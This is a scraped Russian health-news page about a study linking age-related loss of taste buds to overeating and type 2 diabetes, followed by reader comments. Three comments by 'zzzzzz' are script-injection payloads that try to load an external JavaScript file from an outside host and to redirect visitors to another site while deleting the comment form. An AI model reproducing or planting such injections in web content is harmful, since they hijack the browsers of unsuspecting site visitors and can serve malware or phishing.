Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  С каждым годом набираете ...  >>  С каждым годом набираете все больше и больше веса? Во всем виноват ваш язык!
 
Обратная связь
 

С каждым годом набираете все больше и больше веса? Во всем виноват ваш язык!

Размер шрифта
27 марта 2015 00:00
Юрий Малышев
Здоровье инфо
Александр Чистяков
Здоровье инфо
  • google_analytics: false
  • Нравится

Оказывается, с возрастом количество вкусовых сосочков на нашем языке уменьшается. Но это вовсе не безобидный процесс. Чем меньше вкусовых сосочков, тем меньше мы чувствуем еду, и тем больше нам надо съесть, чтобы почувствовать вкус. Именно из-за этого вы и начинаете переедать!

С каждым годом набираете все больше и больше веса? Во всем виноват ваш язык!

«Это может быть причиной того, что сейчас мы наблюдаем так много пожилых людей с сахарным диабетом второго типа», – считает доктор Чи Чиа из Института изучения старения. «Мы обнаружили, что количество вкусовых сосочков связано с возрастом и с уровнем сахара в крови», – рассказывает она.

По современным данным, более 9,3% населения Соединенных Штатов страдают сахарным диабетом второго типа. Причем среди тех, кому старше 65 лет, этот показатель составляет целых 25%. Предыдущие исследования показали, что вкусовые сосочки у пациентов с диабетом второго типа ощущают сладкий вкус совсем не так, как это происходит у здоровых людей. Доктор Чиа, в свою очередь, решила изучить связь этого заболевания с постепенной потерей вкусовых сосочков с возрастом.

Ученые проанализировали данные 353 человек, участвовавших в исследованиях старения. У каждого из них был измерен индекс массы тела (ИМТ), уровень сахара крови, а также количество вкусовых сосочков. Провести измерение количества сосочков очень просто – достаточно использовать синий краситель. Он окрашивает в синий цвет только язык, в то время как вкусовые сосочки остаются розовыми, благодаря чему их можно подсчитать.

«Наши результаты подтверждают теорию о том, что количество вкусовых сосочков связано с тем, как наш организм переваривает глюкозу. С возрастом этот процесс может претерпевать некоторые изменения», – объясняет доктор Чиа. Ученые пока не знают, есть ли способ увеличить количество вкусовых сосочков на языке.

Однако у каждого из нас есть возможность снизить свой риск заболеть сахарным диабетом второго типа. Достаточно лишь правильно питаться, не злоупотреблять сладким и поддерживать нормальный вес.

Результаты этого исследования были представлены на заседании Международного Общества Эндокринологов.

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - cfvfhcrfz544

27 марта 2015 в 10:02

Цитировать   |   Пожаловаться

Читала, что если у человека увеличенный язык и он как бы не уменьшается во рту - это признак повышения уровня сахара в крови.

Отличная статья.

2 - zzzzzz

30 июня 2015 в 18:24

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

3 - zzzzzz

30 июня 2015 в 21:21

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

4 - zzzzzz

30 июня 2015 в 22:16

Цитировать   |   Пожаловаться

-->> window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Три типа ожирения   Как уменьшить жир на лице?   Гнев + голод = гневолод   Сколько воли нужно, чтобы похудеть?  
11 октября 2013Елена Малышева расскажет все о том, как правильно худеть 05 июля 2013Вы не виноваты в своем лишнем весе! Еда всего лишь одна из причин ожирения! Какая же главная?
 
31 мая 2013От инфаркта не убежать, но можно уйти! Новые данные говорят о том, что ходьба также эффективна, как бег, в борьбе с лишним весом! 21 мая 2013Когда я ем – я глух и нем! Ученые доказали, что это поможет похудеть!
 

Слайдшоу

1
Как устоять перед соблазнами?
7 вопросов, чтобы похудеть!
Как не сорваться на диете и похудеть?

Тесты

1
Есть ли у вас избыточный вес?
Жиры, которые мы едим
Готовы ли вы сбросить лишнее?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.